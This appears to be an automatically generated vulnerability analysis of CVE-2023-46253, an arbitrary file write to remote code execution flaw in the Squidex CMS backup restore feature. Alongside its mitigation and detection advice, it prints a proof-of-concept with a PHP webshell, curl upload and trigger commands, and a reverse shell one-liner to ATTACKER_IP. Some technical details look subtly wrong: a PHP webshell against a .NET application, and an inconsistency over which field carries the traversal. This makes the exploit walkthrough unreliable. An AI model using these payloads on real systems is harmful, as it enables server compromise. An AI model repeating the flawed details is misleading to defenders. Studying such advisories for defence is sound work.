Description
Squidex is an open source headless CMS and content management hub. Affected versions are subject to an arbitrary file write vulnerability in the backup restore feature which allows an authenticated attacker to gain remote code execution (RCE). Squidex allows users with the `squidex.admin.restore` permission to create and restore backups. Part of these backups are the assets uploaded to an App. For each asset, the backup zip archive contains a `.asset` file with the actual content of the asset as well as a related `AssetCreatedEventV2` event, which is stored in a JSON file. Amongst other things, the JSON file contains the event type (`AssetCreatedEventV2`), the ID of the asset (`46c05041-9588-4179-b5eb-ddfcd9463e1e`), its filename (`test.txt`), and its file version (`0`). When a backup with this event is restored, the `BackupAssets.ReadAssetAsync` method is responsible for re-creating the asset. For this purpose, it determines the name of the `.asset` file in the zip archive, reads its content, and stores the content in the filestore. When the asset is stored in the filestore via the UploadAsync method, the assetId and fileVersion are passed as arguments. These are further passed to the method GetFileName, which determines the filename where the asset should be stored. The assetId is inserted into the filename without any sanitization and an attacker with squidex.admin.restore privileges to run arbitrary operating system commands on the underlying server (RCE).
EPSS Score:
3%
Comprehensive Technical Analysis of EUVD-2023-50482 (CVE-2023-46253)
Squidex Arbitrary File Write to Remote Code Execution (RCE) Vulnerability
1. Vulnerability Assessment and Severity Evaluation
Vulnerability Overview
EUVD-2023-50482 (CVE-2023-46253) is a critical arbitrary file write vulnerability in Squidex, an open-source headless CMS, leading to Remote Code Execution (RCE). The flaw resides in the backup restore functionality, where an authenticated attacker with squidex.admin.restore permissions can manipulate asset filenames to achieve path traversal and arbitrary file writes, ultimately enabling RCE on the underlying server.
CVSS v3.1 Severity Breakdown
| Metric | Value | Explanation |
|---|---|---|
| Attack Vector (AV) | Network (N) | Exploitable remotely via HTTP(S). |
| Attack Complexity (AC) | Low (L) | No special conditions required; exploitation is straightforward. |
| Privileges Required (PR) | High (H) | Requires squidex.admin.restore permissions. |
| User Interaction (UI) | None (N) | No user interaction needed. |
| Scope (S) | Changed (C) | Impact extends beyond the vulnerable component (RCE on host OS). |
| Confidentiality (C) | High (H) | Full system compromise possible. |
| Integrity (I) | High (H) | Arbitrary file writes allow malicious code execution. |
| Availability (A) | High (H) | Attacker can disrupt services or take over the system. |
| Base Score | 9.1 (Critical) | Aligns with the high-impact nature of RCE vulnerabilities. |
Risk Assessment
- Exploitability: High (authenticated but low-complexity attack).
- Impact: Critical (full system compromise).
- EPSS Score: 3.0% (indicates a moderate likelihood of exploitation in the wild).
- ENISA Classification: High-severity vulnerability requiring immediate patching.
2. Potential Attack Vectors and Exploitation Methods
Exploitation Chain
-
Authentication & Privilege Escalation (if needed)
- Attacker must obtain credentials with
squidex.admin.restorepermissions (either via phishing, credential stuffing, or insider threat). - If default credentials are unchanged, exploitation risk increases.
- Attacker must obtain credentials with
-
Malicious Backup Archive Crafting
- Attacker creates a malicious backup ZIP file containing:
- A
.assetfile with arbitrary content (e.g., a webshell). - A corresponding
AssetCreatedEventV2JSON file with a craftedfilenamefield (e.g.,../../../var/www/html/shell.php).
- A
- Attacker creates a malicious backup ZIP file containing:
-
Path Traversal via Unsanitized
assetId- During restore,
BackupAssets.ReadAssetAsyncprocesses the backup. - The
GetFileNamemethod constructs the destination path using unsanitizedassetId, allowing directory traversal. - Example payload:
{ "type": "AssetCreatedEventV2", "assetId": "../../../var/www/html/shell.php", "fileName": "malicious.php", "fileVersion": 0 } - The
.assetfile content (e.g., PHP webshell) is written to the traversed path.
- During restore,
-
Remote Code Execution (RCE)
- Attacker accesses the written file (e.g.,
http://target/shell.php?cmd=id). - Full system compromise is achieved (reverse shell, data exfiltration, lateral movement).
- Attacker accesses the written file (e.g.,
Proof-of-Concept (PoC) Exploitation
A simplified exploitation flow:
# 1. Craft malicious backup ZIP
echo '<?php system($_GET["cmd"]); ?>' > shell.asset
cat > event.json <<EOF
{
"type": "AssetCreatedEventV2",
"assetId": "../../../../var/www/html/shell.php",
"fileName": "shell.php",
"fileVersion": 0
}
EOF
zip malicious_backup.zip shell.asset event.json
# 2. Upload and restore backup via Squidex API
curl -X POST -H "Authorization: Bearer <ADMIN_TOKEN>" \
-F "file=@malicious_backup.zip" \
"https://squidex-instance/api/apps/<app-id>/backups/restore"
# 3. Trigger RCE
curl "https://squidex-instance/shell.php?cmd=id"
3. Affected Systems and Software Versions
Vulnerable Versions
- Squidex < 7.9.0 (all versions prior to the patch).
- Deployment Models:
- Self-hosted (on-premises/cloud).
- Containerized (Docker/Kubernetes).
- Managed instances (if misconfigured).
Non-Vulnerable Versions
- Squidex ≥ 7.9.0 (patched version).
- Workarounds: Disabling backup restore functionality if patching is not immediately possible.
4. Recommended Mitigation Strategies
Immediate Actions
-
Apply the Patch
- Upgrade to Squidex 7.9.0 or later immediately.
- Patch URL: GitHub Advisory GHSA-phqq-8g7v-3pg5.
-
Temporary Workarounds (if patching is delayed)
- Disable Backup Restore: Remove
squidex.admin.restorepermissions from all users. - Network Segmentation: Restrict access to the Squidex admin interface to trusted IPs.
- File System Hardening:
- Set strict file permissions (e.g.,
chmod 750on web directories). - Use immutable filesystems (e.g., read-only mounts for critical paths).
- Set strict file permissions (e.g.,
- Disable Backup Restore: Remove
-
Monitoring & Detection
- Log Analysis: Monitor for unusual backup restore operations.
- File Integrity Monitoring (FIM): Detect unexpected file writes in web directories.
- WAF Rules: Block requests containing path traversal sequences (
../,..\).
Long-Term Hardening
- Least Privilege Principle: Restrict
squidex.admin.restoreto minimal necessary users. - Input Sanitization: Ensure all file paths are validated and sanitized (e.g., using
Path.GetInvalidFileNameChars()in .NET). - Container Security: Run Squidex in a non-root container with read-only filesystems where possible.
- Regular Audits: Conduct penetration tests and code reviews for similar vulnerabilities.
5. Impact on the European Cybersecurity Landscape
Regulatory & Compliance Implications
- GDPR (Art. 32): Failure to patch may result in non-compliance if RCE leads to data breaches.
- NIS2 Directive: Critical infrastructure operators using Squidex must prioritize patching to avoid penalties.
- ENISA Guidelines: Aligns with ENISA’s vulnerability management best practices (e.g., timely patching, risk assessment).
Threat Landscape
- Targeted Attacks: APT groups may exploit this in supply-chain attacks (e.g., compromising CMS platforms to distribute malware).
- Ransomware Risk: RCE can lead to initial access for ransomware operators (e.g., LockBit, BlackCat).
- Cloud Environments: Misconfigured Squidex instances in AWS/Azure/GCP are high-value targets.
Sector-Specific Risks
| Sector | Risk Level | Potential Impact |
|---|---|---|
| Government | High | Data exfiltration, espionage. |
| Healthcare | Critical | Patient data breaches, HIPAA violations. |
| Finance | High | Fraud, regulatory fines. |
| Media & Publishing | Medium | Defacement, misinformation. |
6. Technical Details for Security Professionals
Root Cause Analysis
- Vulnerable Code Path:
BackupAssets.ReadAssetAsync→UploadAsync→GetFileName(inSquidex.Domain.Apps.Entities.Assets).- The
assetIdis directly interpolated into the file path without sanitization:public string GetFileName(string assetId, long fileVersion) { return $"{assetId}_{fileVersion}.asset"; // UNSANITIZED! } - Attacker-controlled
assetId(e.g.,../../../shell.php) leads to arbitrary file writes.
Exploitation Requirements
- Authentication: Valid credentials with
squidex.admin.restorepermissions. - Network Access: HTTP(S) access to the Squidex admin interface.
- No User Interaction: Exploitable via API calls.
Post-Exploitation Scenarios
- Webshell Deployment:
- Write a PHP/ASPX webshell to a web-accessible directory.
- Reverse Shell:
- Execute a reverse shell payload (e.g.,
bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1').
- Execute a reverse shell payload (e.g.,
- Persistence:
- Add a cron job, SSH key, or backdoor user.
- Lateral Movement:
- Exfiltrate database credentials, pivot to other systems.
Detection & Forensics
- Logs to Investigate:
- Squidex backup restore logs (
/var/log/squidex/). - Web server access logs (unusual
.php/.aspxfile accesses). - File system changes (e.g.,
auditdlogs on Linux).
- Squidex backup restore logs (
- Indicators of Compromise (IoCs):
- Unexpected
.assetfiles in web directories. - Suspicious
AssetCreatedEventV2entries in backups. - Outbound connections to attacker-controlled IPs.
- Unexpected
Defensive Coding Recommendations
- Input Validation:
- Use
Path.GetInvalidFileNameChars()to sanitizeassetId. - Restrict
assetIdto alphanumeric characters only.
- Use
- Secure File Handling:
- Use
Path.Combineinstead of string interpolation for paths. - Enforce whitelisted directories for asset storage.
- Use
- Least Privilege:
- Run Squidex under a dedicated low-privilege user.
- Use AppArmor/SELinux to restrict file system access.
Conclusion
EUVD-2023-50482 (CVE-2023-46253) is a critical RCE vulnerability in Squidex, stemming from unsanitized path handling in the backup restore feature. Given its CVSS 9.1 score and low exploitation complexity, organizations must patch immediately and implement defensive controls to mitigate risk. The vulnerability poses significant threats to European critical infrastructure, particularly in government, healthcare, and finance sectors, and aligns with ENISA’s high-priority vulnerability management guidelines.
Recommended Actions:
- Patch Squidex to ≥7.9.0 without delay.
- Audit user permissions to ensure least privilege.
- Monitor for exploitation attempts via logs and FIM.
- Conduct a post-patch penetration test to verify remediation.
For further details, refer to the GitHub Advisory.